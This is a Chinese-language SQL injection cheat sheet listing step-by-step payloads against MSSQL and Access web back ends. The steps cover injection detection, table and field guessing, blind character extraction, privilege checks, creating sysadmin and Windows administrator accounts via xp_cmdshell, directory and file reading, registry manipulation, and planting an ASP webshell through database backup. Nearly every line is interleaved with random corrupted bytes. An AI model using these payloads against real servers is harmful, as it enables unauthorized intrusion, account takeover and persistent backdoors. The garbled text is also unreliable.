1.判断是否有注入;and 1=1 ;and 1=2 �;<[X\;�|'
2.初步判断是否是mssql ;and user>0 �'!���[oLy
w;z7vN~/O
3.注入参数是字符'and [查询条件] and ''=' |#oS��7oV(
a`x�q
h2P�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' !+l'�<�*8V
=Zd(<&�B K
5.判断数据库系统 �
�is'�V%q
qt�/K��$'�
;and (select count(*) from sysobjects)>0 mssql al2t\Iq9�0
�MdHm%Vx��
;and (select count(*) from msysobjects)>0 access �E+�f)Zg
:
�]Bhy���=1
}E'0�vf�/�
t]�/�eCs�R
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Nk|cU;��?+
j(;^XO� Y#
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �O$Rz��/&�
d9�N���[f>
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ,eX�t�Y}E�
h>N�}M}�8�
9.(1)猜字段的ascii值(access) 7��=!9kk�0
wPA^nZ^}9c
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 __=H"Uh�Wv
�6�4�s;EC
(2)猜字段的ascii值(mssql) AK�:cDKB�O
o�[|�[xuTm
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Y'�v[2���s
]�l�B zp�D
10.测试权限结构(mssql) �5x�Q���-f
C��f��{F"o
$ghZ<Y2}�9
}3p���M,.�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- dmF�n0J�-\
�N�Ym"I`5w
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �!`�DRJ)h�
� T]#��V��
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �:^;c(>u�{
R.�~[�$�G!
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �odR�iCiMH
�6Rc=!�_v^
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- !jCgT��o
y
�i?��00!t
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- / f%�mY�L
d2k-MZu�T6
;and 1=(select IS_MEMBER('db_owner'));-- K��/Q"Z�*�
gP^2GnjHL8
Dg&�84,bv^
jL��VJ+mu�
11.添加mssql和系统的帐户 P3M$&::�D-
6{Wo5O{�!\
;exec master.dbo.sp_addlogin username;-- �04a
^�jjc
;exec master.dbo.sp_password null,username,password;-- a�SL`�yuXu
1+l�8%G=hB
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- u��-_r2�U
�Hbm 4oYN�
;exec master.dbo.xp_cmdshell 'net user username password �_;lw,;ftA
$( h�T{C,K
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- $�] 6u��#5
� @MW@mP)#
;exec master.dbo.xp_cmdshell 'net user username password /add';-- Zt�=|q��$"
Q&9��yrx�.
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- )�uPJ?
2S9
�S-U�od y
@"@a70�WHk
.~�z'm$s1o
12.(1)遍历目录 �9shf�y4?k
gI�+8J.AG=
;create table dirs(paths varchar(100), id int) FG?��Mc'r&
la!]Y-s)'4
;insert dirs exec master.dbo.xp_dirtree 'c:\' ��.�[|U�Ng
SZyk��G�[�
;and (select top 1 paths from dirs)>0 iD�^,�O�)b
Jt~Iv��n�,
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) rK3kg��2H�
3jmo[<p*x�
.��@�1+}�0
q=1 N&#R�G
(2)遍历目录 ��u�uzV,�q
.*O*@)}�Ud
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Z6!�Up1�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 B#�s�C�B&(
f?3-�C8�hU
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 N�Ob`�)�qb
"oP^�2|${
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 T� j$'B[cv
!�avol/��*
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ]#!uke� �Q
��g� \�m�E
kA�:Y^2X'�
�!�_W:%t)g
13.mssql中的存储过程 ��blO4)7m�
4�kOO�3[r�
xp_regenumvalues 注册表根键, 子键 #-{<d�%�qk
U,P��_bz*)
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 1S{Biqi+��
of��vR0yV
xp_regread 根键,子键,键值名 UwN V��v�o
BN/�4O?jD9
;exec xp_regread C�]^E�p��
�w)b�t�v{*
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 k"wQ9=HP7�
:]��3X E�z
xp_regwrite 根键,子键, 值名, 值类型, 值 �7��qKz_O
!�_I�1�=yi
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 sp�K�8^s�h
��I-#H�+\S
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ��F(")ga$r
&�@=J�m
/5
xp_regdeletevalue 根键,子键,值名 }=R]<`Sj.j
�\#sD`��O�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ZOK!S�Bn^?
F^!D[:�;jK
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ��3m�1g"��
J�WV�V?~1�
-D�^I;[j_
��
hfB$4s9
14.mssql的backup创建webshell wj�[�yo
S�
_]:b@gXU�w
use model *k?:k7�8�L
E�)�b$;'��
create table cmd(str image); rP�xRGo��R
_&KqmQ8$7
insert into cmd(str) values (''); Im���]@#�X
=H95?\}T[�
backup database model to disk='c:\l.asp'; W��t��Ss:D
�z]�7 ��WC
r>mBe;�[TX
�b?wr�O��S
15.mssql内置函数
Dy0�8.Sss
ULx��:2j�z
;and (select @@version)>0 获得Windows的版本号 1{uxpYAP=
kG^7�6dAQL
;and user_name()='dbo' 判断当前系统的连接用户是不是sa n �]%2Kx��
B|`?hw@g+�
;and (select user_name())>0 爆当前系统的连接用户 |�x[I!I7.F
a@}.96lStD
;and (select db_name())>0 得到当前连接的数据库 �iTxWXij��
(leX` SN0u
@N'n>8�Wn�
[9��E~=A�#
16.简洁的webshell �,��BdObx�
j�keerU��6
use model �X$};K�\I�
W���'G|sk�
create table cmd(str image); d_[H�|H9i6
1(�' w��g!
insert into cmd(str) values (''); `Fqth^RK?p
�G�'��:3U�
backup database model to disk='g:\wwwtest\l.asp';
